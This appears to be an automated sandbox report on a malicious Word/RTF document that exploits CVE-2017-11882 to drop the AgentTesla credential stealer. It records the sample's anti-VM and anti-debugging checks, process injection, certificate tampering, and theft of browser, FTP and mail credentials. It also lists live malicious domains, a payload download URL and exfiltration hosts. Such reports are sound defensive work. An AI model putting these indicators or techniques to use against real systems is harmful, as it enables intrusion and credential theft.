Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Window / User API: threadDelayed 9698

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2508	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2304	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2784	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2812	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2812	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Code function: 6_2_00403918 LdrInitializeThunk,

6_2_00403918

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Memory written: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Jump to behavior

Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349455339.0000000001230000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349455339.0000000001230000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349455339.0000000001230000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Queries volume information: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Queries volume information: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2348944194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2107988603.0000000003C6A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2712, type: MEMORY
Source: Yara match	File source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2572, type: MEMORY
Source: Yara match	File source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior

Source: Yara match	File source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2712, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2348944194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2107988603.0000000003C6A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2712, type: MEMORY
Source: Yara match	File source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2572, type: MEMORY
Source: Yara match	File source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Path Interception	Process Injection112	Masquerading1	OS Credential Dumping2	Security Software Discovery11	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion13	Input Capture11	Query Registry1	Remote Desktop Protocol	Input Capture11	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools11	Security Account Manager	Virtualization/Sandbox Evasion13	SMB/Windows Admin Shares	Archive Collected Data11	Automated Exfiltration	Ingress Tool Transfer12	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Process Discovery2	Distributed Component Object Model	Data from Local System2	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Application Window Discovery1	SSH	Clipboard Data1	Data Transfer Size Limits	Application Layer Protocol132	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery114	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Pending Orders Statement -40064778.doc	42%	Virustotal		Browse
Pending Orders Statement -40064778.doc	48%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1138205		Download File

Domains

Source	Detection	Scanner	Label	Link
cybersng.duckdns.org	0%	Virustotal		Browse
cy.kl-re.com	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://crl.oces.certifikat.dk/oces.crl0	0%	URL Reputation	safe
http://crl.oces.certifikat.dk/oces.crl0	0%	URL Reputation	safe
http://crl.oces.certifikat.dk/oces.crl0	0%	URL Reputation	safe
http://crl.oces.certifikat.dk/oces.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignCA.crl0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ca.sia.it/seccli/repository/CRL.der0J	0%	URL Reputation	safe
http://ca.sia.it/seccli/repository/CRL.der0J	0%	URL Reputation	safe
http://ca.sia.it/seccli/repository/CRL.der0J	0%	URL Reputation	safe
http://ca.sia.it/seccli/repository/CRL.der0J	0%	URL Reputation	safe
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0	0%	URL Reputation	safe
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0	0%	URL Reputation	safe
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0	0%	URL Reputation	safe
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html0	0%	URL Reputation	safe
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.cr	0%	Avira URL Cloud	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://ca.sia.it/seccli/repository/CPS/	0%	Avira URL Cloud	safe
http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0	0%	URL Reputation	safe
http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0	0%	URL Reputation	safe
http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0	0%	URL Reputation	safe
http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0	0%	URL Reputation	safe
http://crl.chambersign.org/publicnotaryroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/publicnotaryroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/publicnotaryroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/publicnotaryroot.crl0	0%	URL Reputation	safe
http://cy.kl-re.com//power/bo/boobov.exe	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.sk.ee/juur/crl/0	0%	URL Reputation	safe
http://www.sk.ee/juur/crl/0	0%	URL Reputation	safe
http://www.sk.ee/juur/crl/0	0%	URL Reputation	safe
http://www.sk.ee/juur/crl/0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0	0%	URL Reputation	safe
http://193.239.147.103/base/9158412CBF14FB744AFA9F0D01F6CDF2.html	0%	Avira URL Cloud	safe
http://duylfM.com	0%	Avira URL Cloud	safe
http://www.sk.ee/cps/0	0%	URL Reputation	safe
http://www.sk.ee/cps/0	0%	URL Reputation	safe
http://www.sk.ee/cps/0	0%	URL Reputation	safe
http://www.valicert.com/1	0%	URL Reputation	safe
http://www.valicert.com/1	0%	URL Reputation	safe
http://www.valicert.com/1	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
https://xWUrFiDn0aBmFXBFM.net	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cybersng.duckdns.org	172.111.202.41	true	true	0%, Virustotal, Browse	unknown
mail.privateemail.com	198.54.122.60	true	false		high
cy.kl-re.com	unknown	unknown	false	4%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://cy.kl-re.com//power/bo/boobov.exe	true	Avira URL Cloud: safe	unknown
http://193.239.147.103/base/9158412CBF14FB744AFA9F0D01F6CDF2.html	false	Avira URL Cloud: safe	unknown
https://xWUrFiDn0aBmFXBFM.net	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://127.0.0.1:HTTP/1.1	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.oces.certifikat.dk/oces.crl0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://sectigo.com/CPS0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.chambersign.org/chambersroot.crl0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.entrust.net/server1.crl0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	false		high
http://ocsp.sectigo.com0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.entrust.net03	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ca.sia.it/seccli/repository/CRL.der0J	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certicamara.com/dpc/0Z	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp	false		high
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cps.chambersign.org/cps/chambersroot.html0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.cr	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.chambersign.org1	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ca.sia.it/seccli/repository/CPS/	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://mail.privateemail.com	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp	false		high
http://crl.chambersign.org/publicnotaryroot.crl0	poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
